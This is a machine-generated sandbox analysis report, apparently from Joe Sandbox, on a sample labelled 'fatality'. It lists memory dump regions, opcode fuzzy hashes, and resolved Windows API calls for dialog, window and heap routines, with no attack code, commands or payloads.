                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 02c256798a536b04b9911625dcc95db149f3c2cc7e333ba84962b1c285b3e37f
                                                                    • Instruction ID: 90f78863e07f1b5b44ccbe247f97fc13f4d954c5a28415a8f205cbf78c3d961d
                                                                    • Opcode Fuzzy Hash: 02c256798a536b04b9911625dcc95db149f3c2cc7e333ba84962b1c285b3e37f
                                                                    • Instruction Fuzzy Hash: 23E15E755083948FC314CF5AD89086ABFF0AF9A300F45095EF9D4A7352C235E91ADFA6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4284e20d82a4b4c8963c31289ec35e57d4b4c7b0c1d89691f26fd4da53ff202
                                                                    • Instruction ID: 4502d8dce26eed40a1f7ed61d2047e742d62bceb29bc9bc61850f5a3e18ced18
                                                                    • Opcode Fuzzy Hash: c4284e20d82a4b4c8963c31289ec35e57d4b4c7b0c1d89691f26fd4da53ff202
                                                                    • Instruction Fuzzy Hash: B39159B020038E9BD724EF68D890BBF77D4EB50304F15892CEB9A87281DA64A585C372
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                    • Instruction ID: aeb63b3dd3f6194a7dcea32235b87b9dd5564a820f9fce56a9872a030effcace
                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                    • Instruction Fuzzy Hash: CB812F7170438A5BDB24EE6CD8D1BBF37D4EB90304F05892DE7CA8B282DA64D9858771
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2fd62dd51958edeec462a35007a909ff0686b4a8df02bb75a51c409c38096c7c
                                                                    • Instruction ID: 4567be2fbf763a3d8fd94415fe9aa6d001e289f59b5347239a57c76d3d333daa
                                                                    • Opcode Fuzzy Hash: 2fd62dd51958edeec462a35007a909ff0686b4a8df02bb75a51c409c38096c7c
                                                                    • Instruction Fuzzy Hash: 2E616873600F0966DE389A6868957FF23A4EF12348F14391AE443FF2E1D2599DC28E15
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2056870207.0000000005250000.00000040.00001000.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_5250000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: de20917090501bf146550b08cbabfa460931fe278b619aeb5325fc6fafbd11e0
                                                                    • Instruction ID: 1add3e50e497c1dcd0f28c0ccde3879c20220cabb01a2284c1f8b517210545db
                                                                    • Opcode Fuzzy Hash: de20917090501bf146550b08cbabfa460931fe278b619aeb5325fc6fafbd11e0
                                                                    • Instruction Fuzzy Hash: 48816C76D0122A8FCB65CF64CD48A9DB7B9BF44750F154299D80EA3254EB30AE85CF81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2056870207.0000000005250000.00000040.00001000.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_5250000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5db749ab48f145b9f25fa29de45a0be3c2f89a8b2756418baa03d10edf6e5943
                                                                    • Instruction ID: 861f614393fda6ceb178b22257a288a5f391ac282d49757660ec12a5ee0927a2
                                                                    • Opcode Fuzzy Hash: 5db749ab48f145b9f25fa29de45a0be3c2f89a8b2756418baa03d10edf6e5943
                                                                    • Instruction Fuzzy Hash: B8613D75D0522A8BCF65DF28CD88699BBB9BF44740F1042E9E81EA3254EB309E85CF51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6ae80224432dd5d7b2d8a0cdf5cc37334fb2499a6d2045810b5794446211e04
                                                                    • Instruction ID: aa2730e9e38f87dde89965e45ef6c88fbdb779571ecce30f9534fae060d9f617
                                                                    • Opcode Fuzzy Hash: f6ae80224432dd5d7b2d8a0cdf5cc37334fb2499a6d2045810b5794446211e04
                                                                    • Instruction Fuzzy Hash: 7851C3315093D58FD712DF25C5405AEBFE0AE9A314F4909AEE8D95B243C221DB4ACB72
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd11a7780b97373e58bd377f3e9c9fecdf6f90d79a2a4f0f3742fe392c4fa2ac
                                                                    • Instruction ID: 788211c527ee8c282a6d3690996af8753b7b64bf503c4a029140bca5d9e7d9a6
                                                                    • Opcode Fuzzy Hash: fd11a7780b97373e58bd377f3e9c9fecdf6f90d79a2a4f0f3742fe392c4fa2ac
                                                                    • Instruction Fuzzy Hash: A6519EB1D006098FEB25CF55E8817AABBF0FB88344F29C46AD901FB390D3749945CB60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b88dc219f9430997c587fdcba6efa28bdfe8936948f3636732a6b4d3fbfc17f7
                                                                    • Instruction ID: 4ae7409887401b00f4df7ee7653049e943dfcf2c00377d7ae3777e0a2a31f897
                                                                    • Opcode Fuzzy Hash: b88dc219f9430997c587fdcba6efa28bdfe8936948f3636732a6b4d3fbfc17f7
                                                                    • Instruction Fuzzy Hash: 0A51D0B1A087159FC748CF19D48055AFBE1FF88314F058A2EE899E3341DB34E959CB96
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                    • Instruction ID: 3c6587b05f38946549d2b8878119e6107b08e3beeae0a58f7b50f530366ff514
                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                    • Instruction Fuzzy Hash: D43107B1A1474A8FCB18EF28C89116ABBE0FF95304F55852DE589C7341C734EA4ACBA1
                                                                    APIs
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00DFC2B1
                                                                    • EndDialog.USER32(?,00000006), ref: 00DFC2C4
                                                                    • GetDlgItem.USER32(?,0000006C), ref: 00DFC2E0
                                                                    • SetFocus.USER32(00000000), ref: 00DFC2E7
                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00DFC321
                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00DFC358
                                                                    • _swprintf.LIBCMT ref: 00DFC404
                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00DFC417
                                                                    • _swprintf.LIBCMT ref: 00DFC477
                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00DFC48A
                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00DFC4A7
                                                                    • _swprintf.LIBCMT ref: 00DFC535
                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00DFC548
                                                                    • _swprintf.LIBCMT ref: 00DFC59C
                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00DFC5AF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Text$_swprintf$MessageSend$DialogFocusWindow
                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                    • API String ID: 1203808948-1840816070
                                                                    • Opcode ID: 19fdf7ffe9288e50ae402cafbc747461dac17204c13e144b799a1d302534c5e4
                                                                    • Instruction ID: 4b465d68234a8ba98b34510e7c4d109d67173f84c925ae38bdc8f7657377b1c5
                                                                    • Opcode Fuzzy Hash: 19fdf7ffe9288e50ae402cafbc747461dac17204c13e144b799a1d302534c5e4
                                                                    • Instruction Fuzzy Hash: 6D91727224834CBFD2219BB1CD49FFB77ACEB8A700F058819B749E6181D675A6098772
                                                                    APIs
                                                                    • _swprintf.LIBCMT ref: 00DEE30E
                                                                    • _strlen.LIBCMT ref: 00DEE32F
                                                                    • SetDlgItemTextW.USER32(?,00E1E274,?), ref: 00DEE38F
                                                                    • GetWindowRect.USER32(?,?), ref: 00DEE3C9
                                                                    • GetClientRect.USER32(?,?), ref: 00DEE3D5
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00DEE475
                                                                    • GetWindowRect.USER32(?,?), ref: 00DEE4A2
                                                                    • SetWindowTextW.USER32(?,?), ref: 00DEE4DB
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00DEE4E3
                                                                    • GetWindow.USER32(?,00000005), ref: 00DEE4EE
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00DEE51B
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00DEE58D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$Text$ClientItemLongMetricsSystem_strlen_swprintf
                                                                    • String ID: $%s:$CAPTION$d
                                                                    • API String ID: 1208408182-2512411981
                                                                    • Opcode ID: e5b3e0c50cf926806b73f72d5e9d79b76412ef16989cf05a9eedf682be4bfcd2
                                                                    • Instruction ID: 271e34d8069d77863f5e5ef5f52d71bf4a8af3c75d1d5bf01f5c93f5edf6fdb3
                                                                    • Opcode Fuzzy Hash: e5b3e0c50cf926806b73f72d5e9d79b76412ef16989cf05a9eedf682be4bfcd2
                                                                    • Instruction Fuzzy Hash: FB819271108341AFD710DF7ACD89A6FBBE9EBC9704F04091DFA84E7291D671E9098B62
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 00E0CB66
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C71E
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C730
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C742
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C754
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C766
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C778
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C78A
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C79C
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7AE
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7C0
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7D2
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7E4
                                                                      • Part of subcall function 00E0C701: _free.LIBCMT ref: 00E0C7F6
                                                                    • _free.LIBCMT ref: 00E0CB5B
                                                                      • Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E08E7A,?,00000004,00000000,?,00E0C007,?,00000004,00000000,?,?,?,00E08716), ref: 00E08DE2
                                                                    • _free.LIBCMT ref: 00E0CB7D
                                                                    • _free.LIBCMT ref: 00E0CB92
                                                                    • _free.LIBCMT ref: 00E0CB9D
                                                                    • _free.LIBCMT ref: 00E0CBBF
                                                                    • _free.LIBCMT ref: 00E0CBD2
                                                                    • _free.LIBCMT ref: 00E0CBE0
                                                                    • _free.LIBCMT ref: 00E0CBEB
                                                                    • _free.LIBCMT ref: 00E0CC23
                                                                    • _free.LIBCMT ref: 00E0CC2A
                                                                    • _free.LIBCMT ref: 00E0CC47
                                                                    • _free.LIBCMT ref: 00E0CC5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 358854727-0
                                                                    • Opcode ID: d0743c263c6d9e1cafc22c8002e428564c7b70e6de5c4e3bc00c93fafcd902b7
                                                                    • Instruction ID: 38d22fd8d5adf826c14ff3332ddb87a9549622a8436ddc911f8ca3bfe7121a49
                                                                    • Opcode Fuzzy Hash: d0743c263c6d9e1cafc22c8002e428564c7b70e6de5c4e3bc00c93fafcd902b7
                                                                    • Instruction Fuzzy Hash: 73314C316002069FEB21AB78D946B5AB7E9EF50314F247A19E599F61D2DE71ACC0CB10
                                                                    APIs
                                                                    • GetWindow.USER32(?,00000005), ref: 00DFD6C1
                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00DFD6ED
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00DFD709
                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00DFD720
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00DFD734
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00DFD75D
                                                                    • DeleteObject.GDI32(00000000), ref: 00DFD764
                                                                    • GetWindow.USER32(00000000,00000002), ref: 00DFD76D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                    • String ID: STATIC
                                                                    • API String ID: 2845197485-1882779555
                                                                    • Opcode ID: becee84a515179373e09f91ad00eee1b6e80555236db68da50f38a9d8ddbbe34
                                                                    • Instruction ID: 2786483a56c030ee5d9ae44b54cc4b9ce4cbe5a5eae14682378c3716dd074357
                                                                    • Opcode Fuzzy Hash: becee84a515179373e09f91ad00eee1b6e80555236db68da50f38a9d8ddbbe34
                                                                    • Instruction Fuzzy Hash: 441136761003187FE221BB749C4AFBF765EEF05701F16C210FB02F6191DA648E0A42B1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 2929853658-0
                                                                    • Opcode ID: 4eb864aa86226b8a88e804536ae6524db00d3f763b758e0f47388cec99976e86
                                                                    • Instruction ID: 20457c8f4aa7307075a1fd43062a21000d95facd3d3b17a9eaeb7eee054fa829
                                                                    • Opcode Fuzzy Hash: 4eb864aa86226b8a88e804536ae6524db00d3f763b758e0f47388cec99976e86
                                                                    • Instruction Fuzzy Hash: 8411B97612010ABFCB01EF54C942CDD3BB9EF14350B5165A1FA486F1B2DE31DE909B84
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 322700389-393685449
                                                                    • Opcode ID: a56f0e253b67112b867b8e31a11669fa05e212b7249fafa3af5b76b162f59142
                                                                    • Instruction ID: 459ee51aba6c922b43f6c13af0a6a81c11146415351ba1892049cf0f435cbcdf
                                                                    • Opcode Fuzzy Hash: a56f0e253b67112b867b8e31a11669fa05e212b7249fafa3af5b76b162f59142
                                                                    • Instruction Fuzzy Hash: 23B19B31901209EFCF29DFA4C8859AEB7F9FF08314F14615AE9057B292C731DA92CB91
                                                                    APIs
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFB610
                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00DFB637
                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00DFB650
                                                                    • SetWindowTextW.USER32(?,?), ref: 00DFB661
                                                                    • GetDlgItem.USER32(?,00000065), ref: 00DFB66A
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00DFB67E
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00DFB694
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                    • String ID: LICENSEDLG
                                                                    • API String ID: 3214253823-2177901306
                                                                    • Opcode ID: ebcf1b9826e8b88b6b6f69c5b3c9c0d99117aed4df5b68f30cf863fdfbf066a3
                                                                    • Instruction ID: 6597e95e67d7c91d5f52f96659d86314d9a4ae1f8200f4f782c31714973a43a4
                                                                    • Opcode Fuzzy Hash: ebcf1b9826e8b88b6b6f69c5b3c9c0d99117aed4df5b68f30cf863fdfbf066a3
                                                                    • Instruction Fuzzy Hash: 8E21D03664020CBFD2215F77EC49E3B7B6DEB4BB90F068015F740FA1A0CB5299069635
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE6FAA
                                                                    • _wcslen.LIBCMT ref: 00DE7013
                                                                    • _wcslen.LIBCMT ref: 00DE7084
